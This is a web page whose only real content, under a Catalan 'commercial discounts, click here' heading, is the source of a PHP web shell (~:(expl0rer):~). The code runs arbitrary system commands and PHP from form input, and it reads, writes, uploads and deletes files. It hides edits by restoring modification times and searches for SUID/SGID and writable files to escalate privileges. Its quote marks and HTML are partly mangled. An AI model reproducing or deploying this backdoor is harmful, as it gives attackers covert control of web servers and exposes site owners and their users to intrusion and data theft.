Descomptes comercials

Clica aqui

$v) $_POST[$k] = stripslashes($v);
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v);
}

function execute($c){
if(function_exists(‘exec’)){
@exec($c, $out);
return @implode(“n”, $out);
}elseif(function_exists(‘shell_exec’)){
$out = @shell_exec($c);
return $out;
}elseif(function_exists(‘system’)){
@ob_start();
@system($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}else{
return FALSE;
}
}

function read($f){
$str = @file($f);
if($str){
$out = implode(”, $str);
}elseif(function_exists(‘curl_version’)){
@ob_start();
$h = @curl_init(‘file:/’.’/’.$f);
@curl_exec($h);
$out = @ob_get_contents();
@ob_end_clean();
}else{
$out = ‘Could not read file!’;
}
return htmlspecialchars($out);
}

function write($f, $c){
$t = filemtime($f);
$fp = @fopen($f, ‘w’);
if($fp){
fwrite($fp, $c);
fclose($fp);
$out = ‘File saved.’.”n”;
if($t && touch($f, $t)){
$out .= ‘Last modification time changed.’;
}else{
$out .= ‘Could not change last modification time!’;
}
}else{
$out = ‘Saving failed!’;
}
return $out;
}

function file_size($f){
$size = filesize($f);
if($size < 1024) $size = $size.' b'; elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb'; elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb'; return $size; } if(!function_exists('natcasesort')){ function natcasesort($arr){ return sort($arr); } } if(!empty($_POST['dir'])){ $dir = $_POST['dir']; if(!@chdir($dir)) $out = 'chdir() failled!'; } $dir = getcwd(); (strlen($dir) > 1 && $dir[1] == ‘:’) ? $os_type = ‘win’ : $os_type = ‘nix’;

if(!$os_name = @php_uname()){
if(function_exists(‘posix_uname’)){
$os_name = posix_uname();
}elseif($os_name != getenv(‘OS’)){
$os_name = ”;
}
}

if(function_exists(‘posix_getpwuid’)){
$data = posix_getpwuid(posix_getuid());
$user = $data[‘name’].’ uid(‘.$data[‘uid’].’) gid(‘.$data[‘gid’].’)’;
}else{
$user = ”;
}

$safe_mode = get_cfg_var(‘safe_mode’);
$safe_mode ? $safe = ‘on’ : $safe = ‘off’;

execute(‘echo ssps’) ? $execute = ‘on’ : $execute = ‘off’;

$server = getenv(‘SERVER_SOFTWARE’);
if(!$server) $server = ‘—‘;

$out = ”;
$tail = ”;
$aliases = ”;
if(!$safe_mode){
if($os_type == ‘nix’){
$os .= execute(‘sysctl -n kern.ostype’);
$os .= execute(‘sysctl -n kern.osrelease’);
$os .= execute(‘sysctl -n kernel.ostype’);
$os .= execute(‘sysctl -n kernel.osrelease’);
if(empty($user)) $user = execute(‘id’);
$aliases = array(
” => ”,
‘find suid files’=>’find / -type f -perm -04000 -ls’,
‘find sgid files’=>’find / -type f -perm -02000 -ls’,
‘find all writable files in current dir’=>’find . -type f -perm -2 -ls’,
‘find all writable directories in current dir’=>’find . -type d -perm -2 -ls’,
‘find all writable directories and files in current dir’=>’find . -perm -2 -ls’,
‘show opened ports’=>’netstat -an | grep -i listen’,
);
}else{
$os_name .= execute(‘ver’);
$user .= execute(‘echo %username%’);
$aliases = array(
” => ”,
‘show runing services’ => ‘net start’,
‘show process list’ => ‘tasklist’
);
}
}

if(!empty($_POST[‘cmd’])){
$out = execute($_POST[‘cmd’]);
}

elseif(!empty($_POST[‘php’])){
ob_start();
eval($_POST[‘php’]);
$out = ob_get_contents();
ob_end_clean();
}

elseif(!empty($_POST[‘edit’])){
$file = $_POST[‘edit’];
$out = read($file);
$tail = ‘
‘;
}

elseif(!empty($_POST[‘save’])){
$out = write($_POST[‘efile’], $_POST[‘save’]);
}

elseif(!empty($_POST[‘remove’])){
$obj = $_POST[‘remove’];
@is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj);
$res ? $out = ‘Removed successfully’ : $out = ‘Removing failed!’;
}

elseif(!empty($_POST[‘newdir’])){
@mkdir($_POST[‘newdir’]) ? $out = ‘Directory created.’ : $out = ‘Could not create directory!’;
}

elseif(!empty($_POST[‘newfile’])){
@touch($_POST[‘newfile’]) ? $out = ‘File created.’ : $out = ‘Could not create file!’;
}

elseif(!empty($_POST[‘alias’])){
$out = execute($_POST[‘alias’]);
}

elseif(!empty($_FILES[‘ufile’][‘tmp_name’])){
if(!is_uploaded_file($_FILES[‘ufile’][‘tmp_name’]) || @!copy($_FILES[‘ufile’][‘tmp_name’],$dir.chr(47).$_FILES[‘ufile’][‘name’])) $out = ‘Could not upload file’;
else $out = ‘Uploaded successfully.’;
}

print<< table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2}

here;
if(!$safe_mode) print<<

here;
print<<

here;
if($aliases){
print<<

here;
}
print<<

cmd
php
actions edit remove new_dir new_file
aliases
dir
upload

OS: {$os_name}
User: {$user}
Server: {$server}
safe_mode: {$safe} execute: {$execute} max_execution_time: {$limit}
~:(expl0rer):~

here;

if($dp = @openDir($dir)){
$cObj = readDir($dp);
while($cObj){
if(@is_dir($cObj)) $theDirs[] = $cObj;
elseif(@is_file($cObj)) $theFiles[] = $cObj;
$cObj = readDir($dp);
}
closedir($dp);
}

if(!empty($theDirs)){
natcasesort($theDirs);
if($os_type == ‘nix’){
foreach($theDirs as $cDir){
$color=’black’;
if(is_writeable($cDir)){
$color=’red’;
}elseif(is_readable($cDir)){
$color=’blue’;
}
print “<“.$cDir.”>
“;
}
}else{
foreach($theDirs as $cDir){
$tmp = $cDir.’/.ssps_tmp’;
if(@touch($tmp)){
$color=’red’;
unlink($tmp);
}elseif(opendir($cDir)){
closedir();
$color=’blue’;
}else{
$color=’black’;
}
print “<“.$cDir.”>
“;
}
}
} else print ‘
open_basedir restriction in effect. Allowed path is ‘.get_cfg_var(‘open_basedir’);

print ‘
‘;

if(!empty($theFiles)){
natcasesort($theFiles);
print ‘

‘;
foreach($theFiles as $cFile){
$size = file_size($cFile);
if($fp = @fopen($cFile, ‘a’)) $color = ‘red’;
elseif($fp = @fopen($cFile, ‘r’)) $color=’blue’;
else $color = ‘black’;
@fclose($fp);
print ‘

‘;
}
print ‘

‘.$cFile.’ ‘.$size.’

‘;
}

print<<

~:(results):~

{$tail}

here;
die;
}
?>